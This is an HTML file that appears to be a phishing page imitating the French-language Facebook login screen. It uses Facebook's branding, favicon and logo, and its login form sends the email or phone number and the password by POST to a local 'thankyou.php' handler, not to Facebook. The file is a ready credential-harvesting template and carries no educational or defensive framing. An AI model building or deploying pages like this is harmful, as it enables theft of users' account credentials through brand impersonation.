index
2 months ago in HTML
<!DOCTYPE html>
<html>
<head>
<title>Facebook - Connexion ou inscription</title>
<link rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yo/r/iRmz9lCMBD2.ico">
<link rel="stylesheet" type="text/css" href="facebook.css">
</head>
<body bgcolor="#f2f2f2">
<table border="0">
<tr>
<td>
<div align="left" class="logo-area">
<img src="https://static.xx.fbcdn.net/rsrc.php/y1/r/4lCu2zih0ca.svg" height="106px">
<h2>Avec Facebook, partagez et restez en contact avec votre entourage.</h2>
</div>
</td>
<td width="50%">
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<center>
<div class="form" align="center">
<br>
<form action="thankyou.php" method="post">
<div class="elem-group">
<input type="text" id="name" name="visitor_name" placeholder="Adresse e-mail ou num&eacute;ro de t&eacute;l." pattern=[A-Z\sa-z\é]{3,20} required><br> </div>
<div class="elem-group">
<br><input type="password" id="pass" name="visitor_pass" placeholder="Mot de passe" required>
</div><br>
<button type="submit"><b>Se connecter</b></button></form>
<br>
<center><a href="#">Mot de passe oublié ?</a></center>
<br><br>
<hr>
<br>
<center><button id="new"><b>Créer nouveau compte</b></button></center>
<br>
<br>
<br>
<center>
<p></p>
<p><b><a href="#" style="color: #000;">Créer une Page</a></b> pour une célébrité, une marque ou une entreprise.</p>
</center>
</div>
</center>
<br>
<br>
</td>
</tr>
</table>
</body>
</html>